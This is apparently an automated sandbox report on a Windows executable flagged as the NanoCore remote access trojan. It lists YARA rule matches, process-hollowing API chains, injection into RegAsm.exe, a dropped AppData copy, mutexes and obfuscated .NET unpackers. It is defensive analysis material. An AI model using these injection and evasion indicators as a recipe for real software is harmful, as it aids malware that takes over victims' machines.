Source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.616663037.00000000056F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.616663037.00000000056F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: wIQLBHYbqz.exe PID: 4904, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: wIQLBHYbqz.exe PID: 4904, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 4936, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 4936, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RMActivate_isv.exe.bat PID: 6788, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RMActivate_isv.exe.bat PID: 6788, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 7040, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 7040, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_0040E060	0_2_0040E060
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_0040E800	0_2_0040E800
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_0040FE40	0_2_0040FE40
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_00416843	0_2_00416843
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_0048804A	0_2_0048804A
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_00437006	0_2_00437006
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_0041710E	0_2_0041710E
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_00436522	0_2_00436522
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_00418A0E	0_2_00418A0E
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_004216C4	0_2_004216C4
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_00401287	0_2_00401287
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_0042BFE6	0_2_0042BFE6
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_0042DBB5	0_2_0042DBB5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C12B58	13_2_02C12B58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_0543AD38	13_2_0543AD38
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_05433850	13_2_05433850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_05438468	13_2_05438468
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_05439068	13_2_05439068
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_054323A0	13_2_054323A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_05432FA8	13_2_05432FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_0543912F	13_2_0543912F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_0543306F	13_2_0543306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_051B3850	22_2_051B3850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_051B2FA8	22_2_051B2FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_051B23A0	22_2_051B23A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_051B306F	22_2_051B306F

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_3_01411C68 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,	0_3_01411C68
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_3_014100AD NtOpenSection,NtMapViewOfSection,	0_3_014100AD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_0556116A NtQuerySystemInformation,	13_2_0556116A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_0556112F NtQuerySystemInformation,	13_2_0556112F
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Code function: 14_3_016D1C68 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,	14_3_016D1C68
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Code function: 14_3_016D00AD NtOpenSection,NtMapViewOfSection,	14_3_016D00AD

Source: wIQLBHYbqz.exe, 00000000.00000002.611482400.0000000000C73000.00000004.00000001.sdmp	Binary or memory string: FV_ORIGINALFILENAME) vs wIQLBHYbqz.exe
Source: wIQLBHYbqz.exe, 00000000.00000002.611482400.0000000000C73000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs wIQLBHYbqz.exe
Source: wIQLBHYbqz.exe, 00000000.00000002.611076331.0000000000C17000.00000004.00000020.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs wIQLBHYbqz.exe
Source: wIQLBHYbqz.exe	Binary or memory string: OriginalFilenameRdpSaUacHelper4 vs wIQLBHYbqz.exe

Source: wIQLBHYbqz.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wIQLBHYbqz.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wIQLBHYbqz.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wIQLBHYbqz.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RMActivate_isv.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RMActivate_isv.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RMActivate_isv.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RMActivate_isv.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior

Source: wIQLBHYbqz.exe	Virustotal: Detection: 69%
Source: wIQLBHYbqz.exe	Metadefender: Detection: 62%
Source: wIQLBHYbqz.exe	ReversingLabs: Detection: 80%

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

File read: C:\Users\user\Desktop\wIQLBHYbqz.exe

Jump to behavior

Source: wIQLBHYbqz.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wIQLBHYbqz.exe 'C:\Users\user\Desktop\wIQLBHYbqz.exe'
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat 'C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat'
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_05560F2A AdjustTokenPrivileges,		13_2_05560F2A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_05560EF3 AdjustTokenPrivileges,		13_2_05560EF3

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

File created: C:\Users\user\AppData\Roaming\Gfxv2_0

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/3@18/1

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 22.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 22.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_0046A2D5 GetLastError,FormatMessageW,

0_2_0046A2D5

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_00463E91 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

0_2_00463E91

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Mutant created: \Sessions\1\BaseNamedObjects\frenchy_shellcode_001
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{0622add8-a38b-49c1-8dc8-c09cf4320fc4}
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: wIQLBHYbqz.exe

Static file information: File size 1253976 > 1048576

Source: wIQLBHYbqz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: wIQLBHYbqz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: wIQLBHYbqz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: wIQLBHYbqz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: wIQLBHYbqz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: wIQLBHYbqz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: wIQLBHYbqz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: wIQLBHYbqz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: wIQLBHYbqz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: wIQLBHYbqz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: wIQLBHYbqz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: wIQLBHYbqz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe	Code function: 0_2_00428B85 push ecx; ret	0_2_00428B98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C2ABD8 push cs; retf	13_2_02C2ABEF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C29BDF pushfd ; retn 0002h	13_2_02C29BEA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C2AAEF push cs; retf	13_2_02C2AB07
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C274AC push ecx; ret	13_2_02C274AD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C274B8 push ebp; ret	13_2_02C274B9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C2AB63 push cs; retf	13_2_02C2AB7B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_02C29D2C push eax; retf	13_2_02C29D2D
